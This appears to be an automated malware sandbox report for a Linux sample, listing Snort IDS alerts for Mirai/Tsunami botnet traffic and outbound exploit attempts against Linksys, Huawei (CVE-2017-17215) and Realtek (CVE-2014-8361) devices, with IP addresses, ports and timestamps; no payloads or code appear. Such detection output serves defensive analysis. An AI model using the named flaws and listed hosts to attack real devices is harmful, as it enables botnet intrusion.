        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23172.65.122.6336554555552027153 05/14/22-02:12:36.880562
        SID:2027153
        Source Port:36554
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.137.248.14536432802027121 05/14/22-02:12:08.453059
        SID:2027121
        Source Port:36432
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.245.90.17253412555552027153 05/14/22-02:12:57.186108
        SID:2027153
        Source Port:53412
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23172.65.214.13053118555552027153 05/14/22-02:11:51.219527
        SID:2027153
        Source Port:53118
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.241.12.22138544802027121 05/14/22-02:11:55.060172
        SID:2027121
        Source Port:38544
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.182.18248080555552027153 05/14/22-02:13:35.706960
        SID:2027153
        Source Port:48080
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23172.65.121.9241308555552027153 05/14/22-02:12:09.369123
        SID:2027153
        Source Port:41308
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.101.184.23233834802027121 05/14/22-02:12:21.652251
        SID:2027121
        Source Port:33834
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.232.88.7134042528692027339 05/14/22-02:13:40.087312
        SID:2027339
        Source Port:34042
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.178.4134822555552027153 05/14/22-02:12:03.763652
        SID:2027153
        Source Port:34822
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2388.247.218.18357044802027121 05/14/22-02:12:45.593968
        SID:2027121
        Source Port:57044
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.69.9639336555552027153 05/14/22-02:12:07.296304
        SID:2027153
        Source Port:39336
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.101.179.12147784802027121 05/14/22-02:12:31.371567
        SID:2027121
        Source Port:47784
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.224.24.20137358528692027339 05/14/22-02:12:48.476728
        SID:2027339
        Source Port:37358
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.6.51.10858676802027121 05/14/22-02:12:23.988881
        SID:2027121
        Source Port:58676
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.85.10737946555552027153 05/14/22-02:13:35.724142
        SID:2027153
        Source Port:37946
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23172.65.254.1054364555552027153 05/14/22-02:11:51.219793
        SID:2027153
        Source Port:54364
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.216.233.12645134802027121 05/14/22-02:12:12.375722
        SID:2027121
        Source Port:45134
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.161.12547106555552027153 05/14/22-02:11:53.487798
        SID:2027153
        Source Port:47106
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.153.16.9334294802027121 05/14/22-02:11:52.636220
        SID:2027121
        Source Port:34294
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.216.46.16342972802027121 05/14/22-02:11:46.033701
        SID:2027121
        Source Port:42972
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.38.149.7653014802027121 05/14/22-02:12:31.524055
        SID:2027121
        Source Port:53014
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.79.118.17840476802027121 05/14/22-02:11:57.971047
        SID:2027121
        Source Port:40476
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2388.249.29.11953336802027121 05/14/22-02:13:46.157357
        SID:2027121
        Source Port:53336
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.68.14050106555552027153 05/14/22-02:12:34.813598
        SID:2027153
        Source Port:50106
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2388.221.77.4548254802027121 05/14/22-02:13:08.856075
        SID:2027121
        Source Port:48254
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.15.240.18036256802027121 05/14/22-02:12:57.841983
        SID:2027121
        Source Port:36256
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2388.145.17.11850038802027121 05/14/22-02:12:39.860168
        SID:2027121
        Source Port:50038
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.137.248.6544254802027121 05/14/22-02:11:52.623905
        SID:2027121
        Source Port:44254
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.140.37.16651080802027121 05/14/22-02:12:12.365029
        SID:2027121
        Source Port:51080
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.9.938206555552027153 05/14/22-02:13:05.459841
        SID:2027153
        Source Port:38206
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.217.81.20448500802027121 05/14/22-02:12:06.989141
        SID:2027121
        Source Port:48500
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.112.170.4958398802027121 05/14/22-02:12:53.415920
        SID:2027121
        Source Port:58398
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.255.80.23550844555552027153 05/14/22-02:12:37.003666
        SID:2027153
        Source Port:50844
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.58.115.23438118802027121 05/14/22-02:13:01.036403
        SID:2027121
        Source Port:38118
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.57.36.24550622802027121 05/14/22-02:12:41.043513
        SID:2027121
        Source Port:50622
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.217.183.13159274802027121 05/14/22-02:11:50.400173
        SID:2027121
        Source Port:59274
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.42.196.18045740802027121 05/14/22-02:12:31.450640
        SID:2027121
        Source Port:45740
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.10.5133430555552027153 05/14/22-02:12:33.795333
        SID:2027153
        Source Port:33430
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2388.250.111.14434764802027121 05/14/22-02:13:06.536692
        SID:2027121
        Source Port:34764
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.79.23133478555552027153 05/14/22-02:12:16.062298
        SID:2027153
        Source Port:33478
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.155.16.12139454802027121 05/14/22-02:12:31.388864
        SID:2027121
        Source Port:39454
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.179.219.13753258802027121 05/14/22-02:12:25.915169
        SID:2027121
        Source Port:53258
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.234.230.9448464802027121 05/14/22-02:12:07.069322
        SID:2027121
        Source Port:48464
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.216.174.17949448802027121 05/14/22-02:12:38.394262
        SID:2027121
        Source Port:49448
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.65.7.17256166802027121 05/14/22-02:12:41.092384
        SID:2027121
        Source Port:56166
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.225.158.444432528692027339 05/14/22-02:13:11.398903
        SID:2027339
        Source Port:44432
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.128.47.6334392802027121 05/14/22-02:11:57.648436
        SID:2027121
        Source Port:34392
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2388.250.14.12748664802027121 05/14/22-02:12:43.303856
        SID:2027121
        Source Port:48664
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.82.129.19756414802027121 05/14/22-02:12:48.726937
        SID:2027121
        Source Port:56414
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.100.32.17844040802027121 05/14/22-02:12:38.583388
        SID:2027121
        Source Port:44040
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2341.182.106.16151982528692027339 05/14/22-02:12:34.004298
        SID:2027339
        Source Port:51982
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.226.87.24057702528692027339 05/14/22-02:12:14.078724
        SID:2027339
        Source Port:57702
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.250.28.8451218528692027339 05/14/22-02:12:30.163455
        SID:2027339
        Source Port:51218
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2388.221.178.11839856802027121 05/14/22-02:13:20.399630
        SID:2027121
        Source Port:39856
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.219.228.15941954802027121 05/14/22-02:13:26.255296
        SID:2027121
        Source Port:41954
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.103.5337110555552027153 05/14/22-02:13:39.278904
        SID:2027153
        Source Port:37110
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.179.136.2934744802027121 05/14/22-02:12:36.319934
        SID:2027121
        Source Port:34744
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.35.24.8941260802027121 05/14/22-02:12:33.761799
        SID:2027121
        Source Port:41260
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.130.28.14846038802027121 05/14/22-02:12:25.946869
        SID:2027121
        Source Port:46038
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.247.10835834555552027153 05/14/22-02:11:56.029720
        SID:2027153
        Source Port:35834
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.100.78.1757512802027121 05/14/22-02:12:36.286426
        SID:2027121
        Source Port:57512
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.226.101.14858192528692027339 05/14/22-02:13:26.890663
        SID:2027339
        Source Port:58192
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.214.217.5141366802027121 05/14/22-02:11:58.000914
        SID:2027121
        Source Port:41366
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.223.112.7048866802027121 05/14/22-02:12:12.320419
        SID:2027121
        Source Port:48866
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.142.206.19256690802027121 05/14/22-02:13:14.627398
        SID:2027121
        Source Port:56690
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.110.252.1742942802027121 05/14/22-02:11:57.661872
        SID:2027121
        Source Port:42942
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.66.17232904555552027153 05/14/22-02:13:28.458438
        SID:2027153
        Source Port:32904
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.101.105.3756486802027121 05/14/22-02:12:16.042664
        SID:2027121
        Source Port:56486
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.100.75.16236528802027121 05/14/22-02:12:01.373649
        SID:2027121
        Source Port:36528
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.226.61.6434088528692027339 05/14/22-02:12:33.965935
        SID:2027339
        Source Port:34088
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.244.118.3341258528692027339 05/14/22-02:13:12.911524
        SID:2027339
        Source Port:41258
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.120.26.12140584802027121 05/14/22-02:12:28.116129
        SID:2027121
        Source Port:40584
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.159.60.13046212802027121 05/14/22-02:12:21.738119
        SID:2027121
        Source Port:46212
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.144.20.16144268802027121 05/14/22-02:13:26.124337
        SID:2027121
        Source Port:44268
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.100.51.21344342802027121 05/14/22-02:12:36.297626
        SID:2027121
        Source Port:44342
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.3.22346802555552027153 05/14/22-02:11:51.219645
        SID:2027153
        Source Port:46802
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.154.250.9959566802027121 05/14/22-02:12:18.483021
        SID:2027121
        Source Port:59566
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.43.20237380555552027153 05/14/22-02:12:26.237883
        SID:2027153
        Source Port:37380
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.59.51.16444564802027121 05/14/22-02:12:09.948969
        SID:2027121
        Source Port:44564
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23197.148.89.3543430372152835222 05/14/22-02:11:47.945469
        SID:2835222
        Source Port:43430
        Destination Port:37215
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.54.19344722555552027153 05/14/22-02:13:28.810687
        SID:2027153
        Source Port:44722
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.159.46.8743460802027121 05/14/22-02:11:49.354543
        SID:2027121
        Source Port:43460
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.216.160.19341248802027121 05/14/22-02:11:52.570919
        SID:2027121
        Source Port:41248
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.46.1047160555552027153 05/14/22-02:12:20.938865
        SID:2027153
        Source Port:47160
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.156.55.12440254802027121 05/14/22-02:12:33.801748
        SID:2027121
        Source Port:40254
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.32.10158782555552027153 05/14/22-02:13:15.170260
        SID:2027153
        Source Port:58782
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.100.6.21858038802027121 05/14/22-02:12:07.025093
        SID:2027121
        Source Port:58038
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.247.6.5849348555552027153 05/14/22-02:13:28.793318
        SID:2027153
        Source Port:49348
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: qJlf2SjoW4Virustotal: Detection: 49%Perma Link

        Networking

        barindex
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55004 -> 95.223.48.41:80
        Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43430 -> 197.148.89.35:37215
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48152 -> 95.9.225.102:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57518 -> 95.134.255.28:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37452 -> 172.65.118.147:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59274 -> 95.217.183.131:80
        Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40306 -> 197.244.233.150:37215
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59744 -> 172.65.151.77:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:53118 -> 172.65.214.130:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46802 -> 172.65.3.223:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54364 -> 172.65.254.10:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47718 -> 95.216.95.113:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47502 -> 95.78.119.72:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37132 -> 95.100.118.204:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43474 -> 95.250.235.42:80
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55878 -> 156.230.26.191:52869
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44132 -> 172.65.31.227:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:47106 -> 172.65.161.125:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46486 -> 172.245.91.218:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43460 -> 95.159.46.87:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38818 -> 95.101.33.100:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38544 -> 95.241.12.221:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47014 -> 95.8.72.193:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35834 -> 172.65.247.108:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38886 -> 95.101.33.100:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38836 -> 95.159.7.41:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42942 -> 95.110.252.17:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57504 -> 95.94.218.43:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48520 -> 95.59.240.149:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46420 -> 112.199.99.106:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33988 -> 172.65.196.40:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48884 -> 172.65.89.234:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:38076 -> 172.65.96.152:55555
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52070 -> 156.238.47.12:52869
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:58940 -> 172.65.206.173:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36528 -> 95.100.75.162:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44630 -> 95.100.77.146:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38478 -> 95.43.238.153:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36228 -> 95.47.97.70:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34822 -> 172.65.178.41:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52982 -> 95.143.57.78:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39374 -> 95.21.50.3:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45218 -> 95.217.206.177:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49890 -> 95.225.205.130:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35642 -> 172.65.37.243:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41418 -> 95.6.91.36:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48464 -> 95.234.230.94:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39658 -> 172.65.99.156:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39336 -> 172.65.69.96:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52924 -> 95.100.50.139:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39938 -> 95.181.216.180:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49942 -> 95.100.34.126:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49972 -> 95.100.34.126:80
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41018 -> 156.226.67.163:52869
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33946 -> 172.65.3.88:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:41308 -> 172.65.121.92:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45190 -> 95.76.246.196:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37896 -> 95.87.101.101:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54534 -> 95.9.132.130:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44564 -> 95.59.51.164:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44980 -> 172.65.2.8:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33828 -> 172.65.254.156:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46236 -> 172.65.161.250:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48576 -> 172.65.127.32:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:53968 -> 172.65.10.0:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37054 -> 95.159.51.73:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55574 -> 172.65.185.133:55555
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46958 -> 156.250.93.92:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38420 -> 95.154.100.76:80
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57702 -> 156.226.87.240:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56486 -> 95.101.105.37:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:53716 -> 172.65.201.241:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33478 -> 172.65.79.231:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56502 -> 95.101.105.37:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:41954 -> 172.65.239.86:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50144 -> 95.229.119.87:80
        Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43450 -> 197.246.204.45:37215
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39546 -> 172.65.187.187:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59566 -> 95.154.250.99:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:38124 -> 172.65.94.187:55555
